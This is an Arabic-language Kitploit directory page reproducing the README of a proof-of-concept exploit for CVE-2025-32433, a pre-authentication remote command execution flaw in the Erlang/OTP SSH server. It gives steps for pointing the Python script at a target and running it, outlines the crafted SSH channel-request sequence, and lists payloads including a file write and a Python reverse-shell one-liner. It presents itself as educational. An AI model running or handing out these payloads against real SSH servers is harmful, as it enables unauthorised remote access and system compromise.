Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/mdusmandasthaheer/cve-2025-32433
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليمأداة الوصول عن بعدتطوير الحمولات
GitHubmdusmandasthaheer/cve-2025-32433

CVE-2025-32433

استغلال لإثبات المفهوم لثغرة CVE-2025-32433، وهي ثغرة تنفيذ أوامر عن بُعد (RCE) قبل المصادقة في خادم SSH الخاص بـ Erlang/OTP. يتضمن سكربت Python لإرسال طلبات قنوات SSH مُصمّمة خصيصًا وتنفيذ أوامر اعتباطية.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 11 أشهرلم تتم المراجعة بعد

CVE-2025-32433 – ثغرة تنفيذ التعليمات البرمجية عن بُعد في Erlang/OTP SSH

📌 الملخص

CVE-2025-32433 هي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) تؤثر على خدمة SSH في Erlang/OTP. السبب الجذري هو المعالجة غير السليمة لطلبات قنوات SSH قبل المصادقة، والتي يمكن للمهاجم صياغتها للتسبب في تنفيذ أوامر عشوائية قبل المصادقة. يُظهر إثبات المفهوم المرفق (PoC) إرسال حزم SSH مصاغة من هذا القبيل؛ وهو يكتب افتراضيًا /lab.txt على الهدف، ويمكن تكييفه لأوامر أخرى.

⚠️ إخلاء المسؤولية: هذا المستودع لأغراض تعليمية وبحثية فقط. لا تستخدمه ضد الأنظمة دون إذن صريح.

🛠️ الاستخدام

  1. عدّل تفاصيل الهدف في سكربت PoC:
root@kitploit:~
HOST = "127.0.0.1"  # Target IP
PORT = 2222         # Target SSH port
  1. شغّل الاستغلال:
root@kitploit:~
python3 cve-2025-32433.py

افتراضيًا، ينشئ /lab.txt يحتوي على pwned. عدّل الحمولة في build_channel_request لتشغيل أوامرك الخاصة.

🧩 أمثلة على الحمولات

root@kitploit:~
# Write a file
file:write_file("/lab.txt", <<"pwned">>).

Spawn a reverse shell

os:cmd("python3 -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("127.0.0.1",2222)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); import pty; pty.spawn("sh")'")

🔧 كيف يعمل PoC (باختصار)

  • يتصل بخدمة SSH ويتبادل رسائل البانر (banners).
  • يرسل حزمة SSH_MSG_KEXINIT مصاغة لتبدو كمصافحة عادية.
  • يرسل SSH_MSG_CHANNEL_OPEN وSSH_MSG_CHANNEL_REQUEST مع حمولة exec قبل المصادقة.
  • إذا كان الهدف عرضة للثغرة، ينفّذ الخادم أمر Erlang المُرسَل.

🙏 الشكر والتقدير

الاكتشاف والتوثيق بواسطة Matt Keeley (أمن المنصات). شكرًا له على نشر PoC ومشاركة التفاصيل.

رابط المدونة: https://platformsecurity.com/blog/CVE-2025-32433-poc

📚 المراجع

  • مدونة Matt Keeley
  • النشرات الأمنية لـ Erlang/OTP
  • سجل CVE في MITRE
تنزيل الأداة